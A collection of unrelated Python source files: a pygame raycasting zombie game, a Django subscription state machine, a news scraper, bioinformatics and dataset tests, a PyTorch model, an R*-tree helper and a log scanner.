if dist2p < 0.8 and ticks - cooldown > 10: # perform attack, 2s cooldown
enemies[en][10] = ticks # reset cooldown, damage is lower with more enemies on same cell
player_health = player_health - np.random.uniform(0.1, 1 + level/3)/np.sqrt(1+mape[int(posx)][int(posy)])
state = 2
if not_afraid: # turn to player
angle = angle2p(enx, eny, posx, posy)
else: # retreat
state = 2
elif state == 2: # defensive
if not_afraid and ticks - cooldown > 5:
state = 0
else:
angle = angle2p(posx, posy, enx, eny) + np.random.uniform(-0.5, 0.5) #turn around
enemies[en][6], enemies[en][9] = angle+ np.random.uniform(-0.2, 0.2), state
return enemies, player_health, mape
@njit(cache=True)
def check_walls(posx, posy, maph, x, y): # for walking
if not(maph[int(x-0.2)][int(y)] or maph[int(x+0.2)][int(y)] or #check all sides
maph[int(x)][int(y-0.2)] or maph[int(x)][int(y+0.2)]):
posx, posy = x, y
elif not(maph[int(posx-0.2)][int(y)] or maph[int(posx+0.2)][int(y)] or # move only in y
maph[int(posx)][int(y-0.2)] or maph[int(posx)][int(y+0.2)]):
posy = y
elif not(maph[int(x-0.2)][int(posy)] or maph[int(x+0.2)][int(posy)] or # move only in x
maph[int(x)][int(posy-0.2)] or maph[int(x)][int(posy+0.2)]):
posx = x
return posx, posy
@njit(cache=True)
def angle2p(posx, posy, enx, eny):
angle = np.arctan((eny-posy)/(enx-posx+1e-16))
if abs(posx+np.cos(angle)-enx) > abs(posx-enx):
angle = (angle - np.pi)%(2*np.pi)
return angle
@njit(cache=True)
def sort_sprites(posx, posy, rot, enemies, maph, size, er):
for en in range(len(enemies)):
enemies[en][3] = 9999
if enemies[en][8] > 0: # dont bother with the dead
enx, eny = enemies[en][0], enemies[en][1]
backstep = 1
if enemies[en][9] == 1 and enemies[en][3] > 1.7 and enemies[en][3] < 10:
backstep = -1 # avoid going closer than necessary to the player
speed = backstep*er*(2+enemies[en][9]/2)
cos, sin = speed*np.cos(enemies[en][6]), speed*np.sin(enemies[en][6])
x, y = enx+cos, eny+sin
enx, eny = check_walls(enx, eny, maph, x, y)
if enx == enemies[en][0] and eny == enemies[en][1]:
x, y = enx-cos, eny-sin
enx, eny = check_walls(enx, eny, maph, x, y)
if enx == enemies[en][0] and eny == enemies[en][1]:
if maph[int(x)][int(y)] == 0:
enx, eny = x, y
if enx == enemies[en][0] or eny == enemies[en][1]: #check colisions
enemies[en][6] = enemies[en][6] + np.random.uniform(-0.5, 0.5)
if np.random.uniform(0,1) < 0.01:
enemies[en][9] = 0 # return to normal state
enemies[en][0], enemies[en][1] = enx, eny
angle = angle2p(posx, posy, enx, eny)
angle2= (rot-angle)%(2*np.pi)
if angle2 > 10.5*np.pi/6 or angle2 < 1.5*np.pi/6:
dir2p = ((enemies[en][6] - angle -3*np.pi/4)%(2*np.pi))/(np.pi/2)
dist2p = np.sqrt((enx-posx)**2+(eny-posy)**2+1e-16)
enemies[en][2] = angle2
enemies[en][7] = dir2p
if vision(enx, eny, posx, posy, dist2p, maph, size):
enemies[en][3] = 1/dist2p
enemies = enemies[enemies[:, 3].argsort()]
return enemies
def spawn_enemies(number, maph, msize, posx, posy, level=0):
enemies = []
for i in range(number):
x, y = np.random.randint(1, msize-2), np.random.randint(1, msize-2)
while maph[x][y] or (x == int(posx) and y == int(posy)):
x, y = np.random.randint(1, msize-2), np.random.randint(1, msize-2)
x, y = x+0.5, y+0.5
angle2p, invdist2p, dir2p = 0, 1, 0 # angle, inv dist, dir2p relative to player
entype = np.random.choice([0,1]) # 0 zombie, 1 skeleton
direction = np.random.uniform(0, 2*np.pi) # facing direction
size = np.random.uniform(7, 10)
health = size/2 + level/3
state = np.random.randint(0,3) # 0 normal, 1 aggressive, 2 defensive
cooldown = 0 # atack cooldown
# 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10
enemies.append([x, y, angle2p, invdist2p, entype, size, direction, dir2p, health, state, cooldown])
return np.asarray(enemies)
def get_sprites(level):
sheet = pg.image.load('Assets/Sprites/zombie_n_skeleton'+str(level)+'.png').convert_alpha()
sprites = [[], []]
swordsheet = pg.image.load('Assets/Sprites/gun1.png').convert_alpha()
sword = []
for i in range(3):
sword.append(pg.Surface.subsurface(swordsheet,(i*800,0,800,600)))
xx = i*32
sprites[0].append([])
sprites[1].append([])
for j in range(4):
yy = j*100
sprites[0][i].append(pg.Surface.subsurface(sheet,(xx,yy,32,100)))
sprites[1][i].append(pg.Surface.subsurface(sheet,(xx+96,yy,32,100)))
spsize = np.asarray(sprites[0][1][0].get_size())
sword.append(sword[1]) # extra middle frame
swordsp = 0 #current sprite for the sword
return sprites, spsize, sword, swordsp
def draw_sprites(surf, sprites, enemies, spsize, hres, halfvres, ticks, sword, swordsp, rotv):
#enemies : x, y, angle2p, dist2p, type, size, direction, dir2p
offset = int(rotv*halfvres)
cycle = int(ticks)%3 # animation cycle for monsters
for en in range(len(enemies)):
if enemies[en][3] > 10:
break
types, dir2p = int(enemies[en][4]), int(enemies[en][7])
cos2 = np.cos(enemies[en][2])
scale = min(enemies[en][3], 2)*spsize*enemies[en][5]/cos2*hres/800
vert = halfvres + halfvres*min(enemies[en][3], 2)/cos2 - offset
hor = hres/2 - hres*np.sin(enemies[en][2])
if enemies[en][3] > 0.333:
spsurf = pg.transform.scale(sprites[types][cycle][dir2p], scale)
else:
spsurf = pg.transform.smoothscale(sprites[types][cycle][dir2p], scale)
surf.blit(spsurf, (hor,vert)-scale/2)
swordpos = (np.sin(ticks)*10*hres/800,(np.cos(ticks)*10+15)*hres/800) # sword shake
spsurf = pg.transform.scale(sword[int(swordsp)], (hres, halfvres*2))
surf.blit(spsurf, swordpos)
return surf, en-1
def draw_colonel(surf, colonel, posx, posy, enx, eny, hres, halfvres, rot, rotv, maph, size):
angle = angle2p(posx, posy, enx, eny)
angle2= (rot-angle)%(2*np.pi)
if angle2 > 10.5*np.pi/6 or angle2 < 1.5*np.pi/6:
dist2p = np.sqrt((enx-posx)**2+(eny-posy)**2+1e-16)
if vision(enx, eny, posx, posy, dist2p, maph, size):
offset = int(rotv*halfvres)
cos2 = np.cos(angle2)
spsize = np.asarray(colonel.get_size())
scale = min(1/dist2p, 2)*spsize*6/cos2*hres/800
vert = halfvres + halfvres*min(1/dist2p, 2)/cos2 - offset
hor = hres/2 - hres*np.sin(angle2)
if dist2p < 3:
spsurf = pg.transform.scale(colonel, scale)
else:
spsurf = pg.transform.smoothscale(colonel, scale)
surf.blit(spsurf, (hor,vert)-scale/2)
return surf
def load_sounds():
sounds = {}
sounds['step'] = pg.mixer.Sound('Assets/Sounds/playerstep.mp3')
sounds['step2'] = pg.mixer.Sound('Assets/Sounds/enemystep.mp3')
sounds['swoosh'] = pg.mixer.Sound('Assets/Sounds/gun.mp3')
sounds['swoosh2'] = pg.mixer.Sound('Assets/Sounds/gun2.mp3')
sounds['hurt'] = pg.mixer.Sound('Assets/Sounds/damage.mp3')
sounds['deadmonster'] = pg.mixer.Sound('Assets/Sounds/deadmonster.mp3')
sounds['hitmonster'] = pg.mixer.Sound('Assets/Sounds/hitmonster.mp3')
sounds['hitmonster2'] = pg.mixer.Sound('Assets/Sounds/hitmonster2.mp3')
sounds['healthup'] = pg.mixer.Sound('Assets/Sounds/healthup.wav')
sounds['died'] = pg.mixer.Sound('Assets/Sounds/died.wav')
sounds['won'] = pg.mixer.Sound('Assets/Sounds/won.wav')
sounds['music0'] = pg.mixer.Sound('Assets/Sounds/battlemusic0.mp3')
sounds['music1'] = pg.mixer.Sound('Assets/Sounds/battlemusic1.mp3')
return sounds
def pause_menu(surf, menu, pause, options, click, running, m_vol, sfx_vol, sounds, newgame, font, msg, level, ticks, hres, story):
adjust_res = 1
p_mouse = pg.mouse.get_pos()
if options == 0: # main menu
if p_mouse[0] < 600 and p_mouse[1] > 200 and p_mouse[1] < 265: # continue
pg.draw.rect(surf,(150,250,150),(0,200,600,65))
if click:
if newgame == 2:
newgame, story = 1, 1
else:
pause = 0
pg.mouse.set_pos(400,300)
elif p_mouse[0] < 600 and p_mouse[1] > 300 and p_mouse[1] < 365: # new game
pg.draw.rect(surf,(150,150,250),(0,300,600,65))
if click:
if newgame == 0:
newgame = 1
else:
newgame, story = 1, 0
elif p_mouse[0] < 600 and p_mouse[1] > 400 and p_mouse[1] < 465: # options
pg.draw.rect(surf,(150,150,150),(0,400,600,65))
if click:
options = 1
elif p_mouse[0] < 600 and p_mouse[1] > 500 and p_mouse[1] < 565: # leave
pg.draw.rect(surf,(250,150,150),(0,500,600,65))
if click:
if newgame == 0:
newgame = 2
else:
running = 0
elif p_mouse[0] > 679 and p_mouse[1] > 509: # i button
pg.draw.circle(surf,(250,150,150),(736,556), 42)
if click:
options = 2
if newgame == 0:
surf.blit(menu[3], (0,0))
else:
surf.blit(menu[0], (0,0))
if newgame == 0:
surf.blit(font.render(msg, 1, (255, 255, 255)), (30, 100+5*np.sin(ticks-1)))
surf.blit(font.render(msg, 1, (30, 255, 155)), (32, 100+5*np.sin(ticks)))
surf.blit(font.render(str(level), 1, (255, 255, 255)), (675, 275+5*np.sin(ticks-1)))
surf.blit(font.render(str(level), 1, (255, 100, 50)), (677, 275+5*np.sin(ticks)))
elif options == 1: # options menu
if p_mouse[0] > 50 and p_mouse[0] < 130 and p_mouse[1] > 220 and p_mouse[1] < 290: # -resol
pg.draw.rect(surf,(150,250,150),(60,220,70,70))
if click:
adjust_res = 0.9
elif p_mouse[0] > 650 and p_mouse[0] < 720 and p_mouse[1] > 220 and p_mouse[1] < 290: # +resol
pg.draw.rect(surf,(150,250,150),(650,220,70,70))
if click:
adjust_res = 1.1
elif click and p_mouse[0] > 123 and p_mouse[0] < 646 and p_mouse[1] > 360 and p_mouse[1] < 424:
sfx_vol = (p_mouse[0] - 123)/523
set_volume(m_vol, sfx_vol, sounds)
elif click and p_mouse[0] > 123 and p_mouse[0] < 646 and p_mouse[1] > 512 and p_mouse[1] < 566:
m_vol = (p_mouse[0] - 123)/523
set_volume(m_vol, sfx_vol, sounds)
surf.blit(menu[options], (0,0))
pg.draw.polygon(surf, (50, 200, 50), ((123, 414), (123+523*sfx_vol, 414-54*sfx_vol), (123+520*sfx_vol, 418)))
pg.draw.polygon(surf, (50, 200, 50), ((123, 566), (123+523*m_vol, 566-54*m_vol), (123+520*m_vol, 570)))
surf.blit(font.render(str(hres)+" x "+str(int(hres*0.75)), 1, (255, 255, 255)), (200, 220+5*np.sin(ticks-1)))
surf.blit(font.render(str(hres)+" x "+str(int(hres*0.75)), 1, (255, 100, 50)), (202, 220+5*np.sin(ticks)))
elif options == 2: # info
surf.blit(menu[options], (0,0))
if options > 0 and p_mouse[0] > 729 and p_mouse[1] < 60 : # x button
pg.draw.circle(surf,(0,0,0),(768,31), 30)
if click:
options = 0
surf.blit(menu[options], (0,0))
#draw cursor
pg.draw.polygon(surf, (200, 50, 50), ((p_mouse), (p_mouse[0]+20, p_mouse[1]+22), (p_mouse[0], p_mouse[1]+30)))
return surf, pause, options, running, newgame, adjust_res, m_vol, sfx_vol, story
def adjust_resolution(hres=250):
hres = max(min(hres, 800), 80) # limit range from 80x60 to 800x600
halfvres = int(hres*0.375) #vertical resolution/2
mod = hres/60 #scaling factor (60° fov)
frame = np.random.randint(0,255, (hres, halfvres*2, 3))
return hres, halfvres, mod, frame
def set_volume(m_vol, sfx_vol, sounds):
for key in sounds.keys():
sounds[key].set_volume(sfx_vol)
sounds['music0'].set_volume(m_vol)
sounds['music1'].set_volume(m_vol)
def splash_screen(msg, splash, clock, font, screen):
running = 1
clickdelay = 0
while running:
clickdelay += 1
clock.tick(60)
surf = splash.copy()
ticks = pg.time.get_ticks()/200
surf.blit(font.render(msg, 1, (0, 0, 0)), (50, 450+5*np.sin(ticks-1)))
surf.blit(font.render(msg, 1, (255, 255, 255)), (52, 450+5*np.sin(ticks)))
p_mouse = pg.mouse.get_pos()
pg.draw.polygon(surf, (200, 50, 50), ((p_mouse), (p_mouse[0]+20, p_mouse[1]+22), (p_mouse[0], p_mouse[1]+30)))
screen.blit(surf, (0,0))
pg.display.update()
for event in pg.event.get():
if event.type == pg.KEYDOWN or event.type == pg.MOUSEBUTTONDOWN and clickdelay > 50:
return
elif event.type == pg.QUIT:
pg.quit()
if clickdelay == 180:
msg = "Press any key..."
def load_textures(textures):
sky1 = pg.image.load('Assets/Textures/skybox'+str(textures[0])+'.jpg')
floor = pg.surfarray.array3d(pg.image.load('Assets/Textures/floor'+str(textures[1])+'.jpg'))
wall = pg.surfarray.array3d(pg.image.load('Assets/Textures/wall'+str(textures[2])+'.jpg'))
bwall = pg.transform.smoothscale(pg.image.load('Assets/Textures/wall'+str(textures[2])+'.jpg'), (25,25))
bwall = pg.surfarray.array3d(pg.transform.smoothscale(bwall, (100,100)))
door = pg.surfarray.array3d(pg.image.load('Assets/Textures/door'+str(textures[3])+'.jpg'))
window = pg.surfarray.array3d(pg.image.load('Assets/Textures/window'+str(textures[4])+'.jpg'))
if textures[0]%3 > 0: # darker at night
floor = (floor*(1-0.2*textures[0]%3)).astype(int)
wall = (wall*(1-0.2*textures[0]%3)).astype(int)
bwall = (bwall*(1-0.2*textures[0]%3)).astype(int)
door = (door*(1-0.2*textures[0]%3)).astype(int)
window = (window*(1-0.2*textures[0]%3)).astype(int)
return sky1, floor, wall, bwall, door, window
if __name__ == '__main__':
main()
pg.mixer.fadeout(1000)
pg.time.wait(1000)
pg.quit()
|
470944
|
def parse_yaml(input_file):
"""Parse yaml file of configuration parameters."""
with open(input_file, "r") as yaml_file:
params = yaml.load(yaml_file)
return params
params = parse_yaml("preprocess_config.yaml")
ROOT = params["dirs"]["root"]
DATASET = os.path.join(ROOT, params["dirs"]["dataset"])
REORDER = os.path.join(DATASET, params["dirs"]["reorder"])
TRAIN = os.path.join(DATASET, params["dirs"]["train"])
TEST = os.path.join(DATASET, params["dirs"]["test"])
GRIDDED_IMGS = os.path.join(DATASET, params["dirs"]["gridded_imgs"])
GRIDDED_LABELS = os.path.join(DATASET, params["dirs"]["gridded_labels"])
OPENED = os.path.join(DATASET, params["dirs"]["opened"])
INSTANCES = os.path.join(DATASET, params["dirs"]["instances"])
RESULTS = os.path.join(
ROOT, "../", params["dirs"]["results"], params["dirs"]["dataset"]
)
SOURCE_IMGS = os.path.join(ROOT, params["dirs"]["source_imgs"])
SOURCE_LABELS = os.path.join(ROOT, params["dirs"]["source_labels"])
# all files, including ones we don't care about
file_ids_all = next(os.walk(SOURCE_IMGS))[2]
# all multispectral on and off season tifs
image_ids_all = [
image_id for image_id in file_ids_all if "MS" in image_id and ".aux" not in image_id
]
# check for duplicates
assert len(image_ids_all) == len(set(image_ids_all))
image_ids_gs = [image_id for image_id in image_ids_all if "GS" in image_id]
image_ids_os = [image_id for image_id in image_ids_all if "OS" in image_id]
# check for equality
assert len(image_ids_os) == len(image_ids_gs)
# only select growing season images
image_ids_short = [image_id[0:9] for image_id in image_ids_gs]
for imid in image_ids_short:
load_merge_wv2(imid, WV2_DIR)
image_list = next(os.walk(REORDERED_DIR))[2]
|
470951
|
import typing as t
from datetime import date, datetime, timedelta
from django.conf import settings
from django.db import models
from django.db.models.expressions import ExpressionWrapper as E
from django.utils import timezone
from django_fsm import FSMIntegerField, can_proceed, transition
from django_fsm_log.decorators import fsm_log_by, fsm_log_description
from . import signals
from .fsm_hooks import post_transition
from .states import SubscriptionState as State
def as_date(dt):
# type: (datetime) -> date
if timezone.is_aware(dt):
return timezone.localdate(dt)
return dt.date()
class SubscriptionManager(models.Manager):
def add_subscription(self, start, end, reference):
return self.create(state=State.ACTIVE, start=start, end=end, reference=reference)
def trigger_renewals(self):
"""
Finds all subscriptions that are due to be renewed, and begins the renewal process.
"""
count = 0
renewals = self.get_queryset().renewals_due().order_by("last_updated").iterator()
for subscription in renewals:
subscription.renew()
count += 1
return count
def trigger_expiring(self):
"""
Finds all subscriptions that have now finished, and begins the end subscription process.
"""
count = 0
ended = self.get_queryset().expiring().order_by("last_updated").iterator()
for subscription in ended:
subscription.end_subscription()
count += 1
return count
def trigger_suspended(self):
"""
Finds all subscriptions that are due and suspended, and begins the renewal process.
This is useful for handling retries after a failed renewal.
"""
count = 0
suspended = self.get_queryset().suspended().order_by("last_updated").iterator()
for subscription in suspended:
subscription.renew()
count += 1
return count
def trigger_suspended_timeout(self, timeout_hours=48, timeout_days=None):
"""
Finds all subscriptions that have remained in Suspended status for `timeout_hours`, and begins
the end subscription process.
`timeout_days` is deprecated.
"""
if timeout_days is not None:
timeout_hours = timeout_days * 24
count = 0
suspended = (
self.get_queryset().suspended_timeout(timeout_hours).order_by("last_updated").iterator()
)
for subscription in suspended:
subscription.end_subscription()
count += 1
return count
def trigger_stuck(self, timeout_hours=2):
"""
Finds all subscriptions that begun the renewal process but did not complete, and moves them
to the unknown state, requiring manual intervention.
Subscriptions in this state usually crashed during the renewal process, so we don't know if
the renewal succeeded or failed.
"""
retry_stuck = getattr(settings, "SUBSCRIPTIONS_STUCK_RETRY", False)
count = 0
old_renewing: t.Iterable[Subscription] = self.get_queryset().stuck(timeout_hours).order_by(
"last_updated"
).iterator()
for subscription in old_renewing:
if retry_stuck:
subscription.renewal_failed(description="stuck subscription")
else:
subscription.state_unknown(description="stuck subscription")
count += 1
return count
class SubscriptionQuerySet(models.QuerySet):
def renewals_due(self):
return self.filter(state=State.ACTIVE, end__lt=timezone.now())
def expiring(self):
return self.filter(state=State.EXPIRING, end__lt=timezone.now())
def suspended(self):
return self.filter(state=State.SUSPENDED, end__lt=timezone.now())
def suspended_timeout(self, timeout_hours=48, timeout_days=None):
if timeout_days is not None:
timeout_hours = timeout_days * 24
return self.annotate(
cutoff=E(
models.F("end") + timedelta(hours=timeout_hours),
output_field=models.DateTimeField(),
)
).filter(state=State.SUSPENDED, cutoff__lte=timezone.now())
def stuck(self, timeout_hours=2):
return self.filter(
state=State.RENEWING, last_updated__lte=timezone.now() - timedelta(hours=timeout_hours)
)
class Subscription(models.Model):
state = FSMIntegerField(
default=State.ACTIVE,
choices=State.choices(),
protected=True,
help_text="The current status of the subscription. May not be modified directly.",
)
start = models.DateTimeField(default=timezone.now, help_text="When the subscription begins")
end = models.DateTimeField(help_text="When the subscription ends")
reference = models.TextField(max_length=100, help_text="Free text field for user references")
last_updated = models.DateTimeField(
auto_now=True, help_text="Keeps track of when a record was last updated"
)
reason = models.TextField(help_text="Reason for state change, if applicable.")
objects = SubscriptionManager.from_queryset(SubscriptionQuerySet)()
class Meta:
indexes = [
models.Index(fields=["state"], name="subscription_state_idx"),
models.Index(fields=["end"], name="subscription_end_idx"),
models.Index(fields=["last_updated"], name="subscription_last_updated_idx"),
]
get_latest_by = "start"
permissions = (("can_update_state", "Can update subscription state"),)
def __str__(self):
return "[{}] {}: {:%Y-%m-%d} to {:%Y-%m-%d}".format(
self.pk, self.get_state_display(), as_date(self.start), as_date(self.end)
)
def can_proceed(self, transition_method):
return can_proceed(transition_method)
@transition(field=state, source=State.ACTIVE, target=State.EXPIRING)
def cancel_autorenew(self):
self.reason = ""
@post_transition(cancel_autorenew)
def post_cancel_autorenew(self):
self.save()
signals.autorenew_canceled.send_robust(self)
@transition(field=state, source=State.EXPIRING, target=State.ACTIVE)
def enable_autorenew(self):
self.reason = ""
@post_transition(enable_autorenew)
def post_enable_autorenew(self):
self.save()
signals.autorenew_enabled.send_robust(self)
@transition(field=state, source=[State.ACTIVE, State.SUSPENDED], target=State.RENEWING)
def renew(self):
self.reason = ""
@post_transition(renew)
def post_renew(self):
self.save()
signals.subscription_due.send_robust(self)
@fsm_log_description
@transition(
field=state,
source=[State.ACTIVE, State.RENEWING, State.SUSPENDED, State.ERROR],
target=State.ACTIVE,
)
def renewed(self, new_end_date, new_reference, description=None):
self.reason = ""
self.end = new_end_date
self.reference = new_reference
@post_transition(renewed)
def post_renewed(self):
self.save()
signals.subscription_renewed.send_robust(self)
@fsm_log_description
@transition(field=state, source=[State.RENEWING, State.ERROR], target=State.SUSPENDED)
def renewal_failed(self, reason="", description=None):
if description:
self.reason = description
else:
self.reason = reason
@post_transition(renewal_failed)
def post_renewal_failed(self):
self.save()
signals.renewal_failed.send_robust(self)
@fsm_log_by
@fsm_log_description
@transition(
field=state,
source=[State.ACTIVE, State.SUSPENDED, State.EXPIRING, State.ERROR],
target=State.ENDED,
)
def end_subscription(self, reason="", by=None, description=None):
if description:
self.reason = description
else:
self.reason = reason
self.end = timezone.now()
@post_transition(end_subscription)
def post_end_subscription(self):
self.save()
signals.subscription_ended.send_robust(self)
@fsm_log_description
@transition(field=state, source=State.RENEWING, target=State.ERROR)
def state_unknown(self, reason="", description=None):
"""
An error occurred after the payment was signalled, but before the
subscription could be updated, so the correct state is unknown.
Requires manual investigation to determine the correct state from
here.
If a record remains in RENEWING state for longer than some timeout, the
record will be moved to this state.
"""
if description:
self.reason = description
else:
self.reason = reason
@post_transition(state_unknown)
def post_state_unknown(self):
self.save()
signals.subscription_error.send_robust(self)
|
470958
|
import requests
from bs4 import BeautifulSoup
# this code will scrap data of the date entered by the user..
print ("enter the date in DD/MM/YYYY")
date = raw_input()
day = date[:2]
month = date[3:-5]
year = date[-4:]
#you can make the link dynamic by iterating it into for loop
r = requests.get('http://www.business-standard.com/todays-paper/?print_dd='+day+'&print_mm='+month+'&print_yy='+year);
soup = BeautifulSoup(r.content,"html.parser")
#print (soup.prettify())
topBdata = soup.find_all ("div",{"class":"topB"})
#this data can be stored in csv format
for dataCluster in topBdata:
for data in dataCluster.find_all("ul",{"class":"aticle-txt"}):
print (data.text)
|
470985
|
from resolwe.flow.models import Data
from resolwe.test import tag_process
from resolwe_bio.utils.test import BioProcessTestCase
class CutAndRunTestCase(BioProcessTestCase):
@tag_process("workflow-cutnrun")
def test_cutnrun(self):
species = "Homo sapiens"
build = "custom_build"
with self.preparation_stage():
# Data is from chr17:3020000-3040800 of mouse genome (mm10).
reads = self.prepare_paired_reads(
mate1=["./workflow_cutnrun/input/chr17_cutnrun_1.fastq.gz"],
mate2=["./workflow_cutnrun/input/chr17_cutnrun_2.fastq.gz"],
)
ref_seq = self.run_process(
"upload-fasta-nucl",
{
# Mouse genome (mm10) prepared by cutting chr17 up to 30040800 bp.
"src": "./workflow_cutnrun/input/mm10_chr17_upto_3040800.fasta.gz",
"species": species,
"build": build,
},
)
bowtie2_index = self.run_process("bowtie2-index", {"ref_seq": ref_seq.id})
input_workflow = {
"reads": reads.id,
"options_aln_species": {
"genome": bowtie2_index.id,
},
"options_aln_spikein": {
"genome": bowtie2_index.id,
},
"options_sieve": {
"max_frag_length": 120,
},
"options_misc": {
"bw_binsize": 50,
"bw_timeout": 30,
},
}
self.run_process("workflow-cutnrun", input_workflow)
for data in Data.objects.all():
self.assertStatus(data, Data.STATUS_DONE)
cnr = Data.objects.last()
self.assertFile(
obj=cnr,
field_path="bigwig",
fn="./workflow_cutnrun/output/normalized.bigwig",
)
|
470993
|
import unittest
from aggregate.sequence_labeling import get_statistics as get_statistics_sl
from aggregate.text_classification import get_statistics as get_statistics_tc
from aggregate.text_matching import get_statistics as get_statistics_tm
from datalabs import load_dataset
class MyTestCase(unittest.TestCase):
def test_Data_featurize(self):
print("\n---- test aggregate operation ---")
# text classification
dataset = load_dataset("mr")
res = dataset["test"].apply(get_statistics_tc)
print(res._stat["dataset-level"]["length_info"]["max_text_length"])
self.assertEqual(
res._stat["dataset-level"]["length_info"]["max_text_length"], 61
)
# text matching
dataset = load_dataset("sick")
res = dataset["test"].apply(get_statistics_tm)
print(res._stat["dataset-level"]["length_info"]["max_text1_length"])
# self.assertEqual(res._stat["dataset-level"]["length_info"]
# ["max_text1_length"], 61)
# ner
dataset = load_dataset("conll2003", "ner")
print(get_statistics_sl)
print(get_statistics_sl._type)
res = dataset["test"].apply(get_statistics_sl)
print(res)
print(res._stat["dataset-level"]["length_info"]["max_text_length"])
# self.assertEqual(res._stat["dataset-level"]["length_info"]
# ["max_text_length"], 61)
if __name__ == "__main__":
unittest.main()
|
471044
|
from ft5406 import Touchscreen, TS_PRESS, TS_RELEASE, TS_MOVE
ts = Touchscreen()
def touch_handler(event, touch):
if event == TS_PRESS:
print("Got Press", touch)
if event == TS_RELEASE:
print("Got release", touch)
if event == TS_MOVE:
print("Got move", touch)
for touch in ts.touches:
touch.on_press = touch_handler
touch.on_release = touch_handler
touch.on_move = touch_handler
ts.run()
while True:
# Redraw Code etc
try:
pass
except KeyboardInterrupt:
ts.stop()
exit()
|
471060
|
import torch
import torch.nn as nn
from models.utils import create_mlp_components
__all__ = ['CenterRegressionNet']
class CenterRegressionNet(nn.Module):
blocks = (128, 128, 256)
def __init__(self, num_classes=3, width_multiplier=1):
super().__init__()
self.in_channels = 3
self.num_classes = num_classes
layers, channels = create_mlp_components(in_channels=self.in_channels, out_channels=self.blocks,
classifier=False, dim=2, width_multiplier=width_multiplier)
self.features = nn.Sequential(*layers)
layers, _ = create_mlp_components(in_channels=(channels + num_classes), out_channels=[256, 128, 3],
classifier=True, dim=1, width_multiplier=width_multiplier)
self.regression = nn.Sequential(*layers)
def forward(self, inputs):
coords = inputs['coords']
one_hot_vectors = inputs['one_hot_vectors']
assert one_hot_vectors.dim() == 2 # [B, C]
features = self.features(coords)
features = features.max(dim=-1, keepdim=False).values
return self.regression(torch.cat([features, one_hot_vectors], dim=1))
|
471086
|
from typing import Tuple
from .rect import Rect, union_all
from ..rtree import EntryDivision
class EntryDistribution:
"""
Represents a distribution of entries into two groups, where the order of entries in each group is not relevant.
This class is similar to the EntryDivision type alias, but contains additional helper methods for working with
the distribution (e.g., getting bounding rectangles for each group), as well as equality and hash operators so
the list of distributions can be used as part of a set (as required by RStarStat).
"""
def __init__(self, division: EntryDivision):
"""
Creates an RStarDistribution from an EntryDivision.
:param division: Entry division. Note that an EntryDivision is nothing more than a type alias for a tuple
containing two lists of entries.
"""
self.division = division
self.set1 = set(division[0])
self.set2 = set(division[1])
r1 = union_all([e.rect for e in division[0]])
r2 = union_all([e.rect for e in division[1]])
self.overlap = r1.get_intersection_area(r2)
self.perimeter = r1.perimeter() + r2.perimeter()
def is_division_equivalent(self, division: EntryDivision) -> bool:
"""
Returns True if the given entry division may be considered equivalent (i.e., its two groups contain the same
entries, independent of the order of both the groups themselves, as well as the entries in each group).
:param division: Entry division
:return: True if the entry division may be considered equivalent to this distribution
"""
set1 = set(division[0])
set2 = set(division[1])
return (self.set1 == set1 and self.set2 == set2) or (self.set1 == set2 and self.set2 == set1)
def get_rects(self) -> Tuple[Rect, Rect]:
"""Returns the two rectangles corresponding to the bounding boxes of each group in the distribution."""
r1 = union_all([e.rect for e in self.division[0]])
r2 = union_all([e.rect for e in self.division[1]])
return r1, r2
def __eq__(self, other):
if isinstance(other, self.__class__):
return (self.set1 == other.set1 and self.set2 == other.set2) \
or (self.set1 == other.set2 and self.set2 == other.set1)
return False
def __ne__(self, other):
return not self == other
def __hash__(self):
return hash(frozenset([frozenset(self.set1), frozenset(self.set2)]))
def __repr__(self):
return f'RStarDistribution({[e.data for e in self.set1]}, {[e.data for e in self.set2]})'
|
471110
|
import logging
import os
import time
from pykit import fsutil
logger = logging.getLogger(__name__)
class ParseLogError(Exception):
pass
def build_entry(context, log_name, file_name, log_str, log_conf):
log_entry = {
'log_name': log_name,
'log_file': file_name,
'content': log_str,
'node_id': context['node_id'],
'node_ip': context['node_ip'],
'count': 1,
}
try:
log_info = log_conf['parse'](log_str)
except Exception as e:
logger.exception('failed to parse log: %s, %s, %s' %
(log_name, log_str, repr(e)))
raise ParseLogError('faild to parse log: %s' % log_name)
log_entry.update(log_info)
return log_entry
def put_into_cache(log_cache, log_entry, merge=True, nlimit=None):
source_file = log_entry['source_file']
if not merge:
nlimit = nlimit or 10240
if source_file not in log_cache:
log_cache[source_file] = []
log_cache[source_file].append(log_entry)
if len(log_cache[source_file]) > nlimit:
log_cache[source_file] = log_cache[source_file][:nlimit]
return
log_ts = log_entry['log_ts']
line_number = log_entry['line_number']
if log_ts not in log_cache:
log_cache[log_ts] = {}
if source_file not in log_cache[log_ts]:
log_cache[log_ts][source_file] = {}
cache_source_file = log_cache[log_ts][source_file]
if line_number not in cache_source_file:
cache_source_file[line_number] = log_entry
return
old_entry = cache_source_file[line_number]
log_entry['count'] = old_entry['count'] + 1
cache_source_file[line_number] = log_entry
return
def _iter_log(log_conf):
file_path = log_conf['file_path']
log_lines = []
try:
for line in fsutil.Cat(file_path).iterate(
timeout=3, default_seek=-1024*1024*2):
if log_conf['is_first_line'](line):
if len(log_lines) > 0:
yield ''.join(log_lines)
log_lines = []
log_lines = [line]
else:
if len(log_lines) < 100:
log_lines.append(line)
except Exception as e:
logger.info('got exception: %s when iter lines of file: %s' %
(repr(e), file_path))
if len(log_lines) > 0:
yield ''.join(log_lines)
def iter_log(log_conf):
while True:
for log_str in _iter_log(log_conf):
yield log_str
time.sleep(1)
def _scan(context, log_name):
log_stat = context['stat'][log_name]
log_conf = context['conf'][log_name]
log_cache = context['cache'][log_name]
file_path = log_conf['file_path']
file_name = os.path.basename(file_path)
log_stat['total_n'] = 0
log_stat['reported_n'] = 0
for log_str in iter_log(log_conf):
log_str = log_str[:10240]
log_stat['total_n'] += 1
log_level = log_conf['get_level'](log_str)
if log_level not in log_conf['level']:
continue
log_entry = build_entry(context, log_name, file_name,
log_str, log_conf)
log_stat['latence'] = time.time() - log_entry['log_ts']
log_stat['reported_n'] += 1
cache_nlimit = log_conf.get("cache_nlimit", None)
merge = log_conf.get("merge", True)
with context['cache_lock']:
put_into_cache(log_cache, log_entry, merge, cache_nlimit)
def scan(context, log_name):
while True:
try:
_scan(context, log_name)
except Exception as e:
logger.exception('failed to scan log: %s, %s' %
(log_name, repr(e)))
context['stat'][log_name]['error'] = repr(e)
time.sleep(1)
|
471131
|
from typing import List, Optional
